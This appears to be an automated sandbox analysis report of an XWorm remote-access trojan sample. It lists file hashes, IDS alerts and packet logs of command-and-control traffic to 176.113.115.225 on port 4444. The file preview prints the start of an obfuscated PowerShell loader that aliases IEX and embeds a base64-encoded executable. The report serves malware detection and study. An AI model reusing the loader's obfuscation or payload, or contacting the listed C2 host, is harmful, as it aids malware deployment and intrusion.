                                            SSDEEP:3072:SB7VzghaUYePuBkEx9W2a4OlnlMDFQiPXqGlZPfOBAZR6Oc:SB5VePtS9W2a4OlnlMpTPXVWBAH6Oc
                                            TLSH:B1F308318914BC5BCEEF2F8665102FD23C79253BCE651028F58F19B92E642349E7AF64
                                            File Content Preview:.... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAKvny6YAAAAAAAAAA
                                            Icon Hash:3270d6baae77db44

                                            Download Network PCAP: filteredfull

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2025-01-28T12:23:26.807778+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:23:27.023169+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:23:27.307565+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:23:35.884149+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:23:35.884149+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:23:39.893947+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:23:39.909678+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:23:52.769091+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:23:52.773427+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:05.664555+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:05.666581+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:05.886218+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:18.527432+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:18.529867+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:21.628137+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:21.634672+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:21.750649+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:21.758652+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:26.972360+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:26.976678+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:27.373556+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:27.375983+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:27.494814+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:27.497081+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:27.615955+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:27.619295+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:35.882836+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:37.643539+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:37.648693+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:37.765523+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:37.767213+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:37.909469+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:37.911386+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:42.925238+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:42.927266+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:43.047982+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:43.050094+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:53.035067+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:53.040631+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:53.157468+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:53.159267+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:53.562775+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:53.584201+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:53.738401+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:53.897168+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:03.414632+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:03.416900+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:03.422945+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:03.424967+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:05.899412+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:10.488112+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:10.516865+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:13.511614+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:13.513922+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:14.415618+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:14.418720+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:27.070180+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:27.367080+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:27.369454+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:34.379297+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:34.383872+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:35.909409+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:41.599608+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:41.602344+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:43.064967+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:43.067711+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:45.661132+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:45.663000+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:58.523391+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:58.525437+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:01.175747+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:01.177247+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:02.217210+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:02.217544+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:02.217814+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:02.219550+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:02.431071+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:02.433315+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:05.920555+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:12.409871+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:12.412310+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:13.238106+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:13.239839+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:18.066460+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:18.411580+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:25.113128+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:25.122064+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:27.815842+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:27.819607+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:27.988143+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:27.991592+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:28.110626+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:28.112229+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:28.408775+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:28.411007+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:28.676942+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:28.682056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:29.097432+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:29.099404+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:31.488902+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:31.490696+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:34.035130+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:34.039595+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:35.928828+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:38.413379+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:38.414881+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:39.128239+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:39.135435+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:39.335986+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:39.339163+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:40.317484+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:40.319218+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:49.521752+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:49.523712+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:49.642322+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:49.648494+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:49.765402+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:49.767663+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:49.884171+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:49.887455+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:50.340712+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:50.343534+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:55.301255+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:55.303233+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:55.684756+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:55.686427+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:27:01.425651+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:01.427397+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:27:05.948767+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:06.769231+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:06.770870+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:27:06.891752+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:06.894142+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:27:14.425804+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:14.427797+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:27:15.926110+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:15.927184+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 28, 2025 12:23:13.674097061 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:13.678921938 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:13.679132938 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:13.935779095 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:13.940576077 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:26.807777882 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:26.812655926 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:27.023169041 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:27.069195986 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:27.307564974 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:27.312534094 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:35.884149075 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:35.928595066 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:39.678898096 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:39.684005976 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:39.893946886 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:39.909677982 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:39.914580107 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:52.554130077 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:52.559052944 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:52.769090891 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:23:52.773427010 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:23:52.778470039 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:05.428853035 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:05.433629036 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:05.664555073 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:05.666580915 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:05.671371937 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:05.886218071 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:05.928659916 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:18.303950071 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:18.308845997 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:18.527431965 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:18.529866934 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:18.534707069 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:21.413450003 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:21.418262959 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:21.444650888 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:21.449661016 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:21.628137112 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:21.634671926 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:21.639403105 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:21.750648975 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:21.758651972 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:21.763834953 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:26.757464886 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:26.762353897 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:26.972359896 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:26.976677895 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:26.981479883 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:27.101130009 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:27.105937004 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:27.132790089 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:27.137617111 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:27.210463047 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:27.215240955 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:27.373555899 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:27.375983000 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:27.380800009 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:27.494813919 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:27.497081041 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:27.501929998 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:27.615955114 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:27.619294882 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:27.626394987 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:35.882836103 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:35.929414034 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:37.429112911 CET497054444192.168.2.8176.113.115.225
                                            Jan 28, 2025 12:24:37.433955908 CET444449705176.113.115.225192.168.2.8
                                            Jan 28, 2025 12:24:37.538487911 CET497054444192.168.2.8176.113.115.225
